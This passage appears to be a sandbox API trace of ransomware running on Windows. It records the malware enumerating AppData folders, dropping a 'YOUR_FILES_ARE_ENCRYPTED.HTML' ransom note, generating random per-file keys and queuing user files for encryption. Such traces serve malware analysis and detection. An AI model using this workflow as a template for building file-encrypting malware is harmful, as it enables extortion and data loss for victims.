ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="FORMS", cAlternateFileName="")) returned 1 [0159.288] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS") returned 53 [0159.288] GetProcessHeap () returned 0x270000 [0159.288] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.288] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS" [0159.288] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\*" [0159.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.289] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.289] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4862a00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 1 [0159.289] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 66 [0159.289] lstrcmpW (lpString1="FRMCACHE.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.289] PathFindExtensionW (pszPath="FRMCACHE.DAT") returned=".DAT" [0159.289] lstrlenW (lpString=".DAT") returned 4 [0159.289] PathFindExtensionW (pszPath="FRMCACHE.DAT") returned=".DAT" [0159.289] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4862a00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 0 [0159.289] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.289] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0159.290] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\FORMS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\forms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.290] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.292] CloseHandle (hObject=0x4a8) returned 1 [0159.292] GetProcessHeap () returned 0x270000 [0159.293] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.293] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0159.293] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer") returned 65 [0159.293] GetProcessHeap () returned 0x270000 [0159.293] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.293] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet 
Explorer" [0159.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\*" [0159.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.294] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.294] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd6127ed0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6127ed0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad9e0a4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2f9d, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.bak", cAlternateFileName="")) returned 1 [0159.294] wnsprintfW (in: pszDest=0x75f0050, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 77 [0159.294] lstrcmpW (lpString1="brndlog.bak", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.294] PathFindExtensionW (pszPath="brndlog.bak") returned=".bak" [0159.294] lstrlenW (lpString=".bak") returned 4 [0159.294] PathFindExtensionW (pszPath="brndlog.bak") returned=".bak" [0159.294] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0159.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0159.294] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=12189) returned 1 [0159.294] GetProcessHeap () returned 0x270000 [0159.294] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.298] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="C1") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="F0") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B1") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="28") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="34") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="5E") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="02") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="4A") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" 
| out: param_1="6D") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="B3") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="4C") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="05") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="1B") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="E9") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="56") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="4C") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="0A") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="AE") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="CE") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="BB") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="B2") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="4C") returned 2 [0159.298] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="A7") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="5F") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="7D") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="2D") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="96") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="10") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="32") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="DC") returned 2 [0159.299] wsprintfW (in: 
param_1=0x4ebd496, param_2="%02X" | out: param_1="ED") returned 2 [0159.299] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="51") returned 2 [0159.299] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" [0159.299] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.299] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.299] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6232870, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x2f9a, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0159.299] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 77 [0159.300] lstrcmpW (lpString1="brndlog.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.300] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0159.300] lstrlenW (lpString=".txt") returned 4 [0159.300] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0159.300] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0159.300] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.301] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=12186) returned 1 [0159.301] GetProcessHeap () returned 0x270000 [0159.301] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0159.306] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="5E") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="97") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B4") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="FB") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="87") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="31") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="9F") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="08") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="11") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="FB") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="25") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="90") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="1C") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="C2") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="15") returned 2 
[0159.306] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="AC") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="07") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="45") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="98") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="9D") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="DA") returned 2 [0159.306] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="3D") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="04") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="F5") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="78") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="72") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="F9") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="55") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="2B") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="20") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="17") returned 2 [0159.307] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="3E") returned 2 [0159.307] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" [0159.307] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, 
CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.308] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0159.308] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recovery", cAlternateFileName="")) returned 1 [0159.308] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned 74 [0159.308] GetProcessHeap () returned 0x270000 [0159.308] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x744a1c0 [0159.308] lstrcpyW (in: lpString1=0x744a1c0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" [0159.308] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*" [0159.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3b3ce0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3b3ce0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c300d, dwReserved1=0x0, cFileName="Active", cAlternateFileName="")) returned 1 [0159.309] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned 81 [0159.309] GetProcessHeap () returned 0x270000 [0159.309] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x745a1c8 [0159.310] lstrcpyW (in: lpString1=0x745a1c8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet 
Explorer\\Recovery\\Active") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" [0159.310] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*" [0159.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.310] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab3b3ce0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.310] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab3d9e40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3d9e40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, 
ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x60, cFileName="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat", cAlternateFileName="RECOVE~1.DAT")) returned 1 [0159.310] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat") returned 138 [0159.310] lstrcmpW (lpString1="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.310] PathFindExtensionW (pszPath="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.310] lstrlenW (lpString=".dat") returned 4 [0159.310] PathFindExtensionW (pszPath="RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat") returned=".dat" [0159.310] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RecoveryStore.{E86C0042-5383-11EC-8920-000E3127764A}.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\internet 